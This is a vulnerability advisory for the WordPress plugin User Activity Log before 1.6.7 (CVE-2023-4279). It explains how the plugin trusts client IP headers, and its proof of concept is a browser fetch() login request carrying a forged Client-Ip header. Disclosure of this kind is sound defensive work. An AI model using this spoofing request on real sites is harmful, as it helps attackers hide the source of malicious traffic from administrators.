WordPress Plugin Vulnerabilities

User Activity Log < 1.6.7 - IP Spoofing

Description

This plugin retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to hide the source of malicious traffic.

Proof of Concept

1. In User Activity Log > Settings, enable the setting "Allow Ip Address of users to log." and save settings.

2. Run the following code in the web browser and note on the backend that the IP address has been faked.

await fetch("/wp-login.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
    "Client-Ip": "8.8.8.8",
  },
  "body": "log=USERNAME&pwd=PASSWORD",
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
});

Affects Plugins

Plugin icon
user-activity-log
Fixed in 1.6.7

References

CVE
CVE-2023-4279

Classification

Type
SPOOFING
OWASP top 10
A5: Broken Access Control
CWE
CWE-290
CVSS
5.3 (medium)

Miscellaneous

Original Researcher
Bartlomiej Marek and Tomasz Swiadek
Submitter
Bartlomiej Marek
Verified
Yes
WPVDB ID
2bd2579e-b383-4d12-b207-6fc32cfb82bc

Timeline

Publicly Published
2023-08-14 (about 3 months ago)
Added
2023-08-14 (about 3 months ago)
Last Updated
2023-08-14 (about 3 months ago)

Other

Published
Title
Published
2023-09-25
Title
User Activity Log Pro < 2.3.4 - IP Spoofing
Published
2023-09-01
Title
Activity Log < 2.8.8 - IP Spoofing
Published
2023-11-06
Title
Security & Malware scan by CleanTalk < 2.121 - IP Spoofing
Published
2023-08-28
Title
DoLogin Security < 3.7 - IP Spoofing
Published
2023-11-27
Title
Antispam Bee < 2.11.4 - IP Address Spoofing via get_client_ip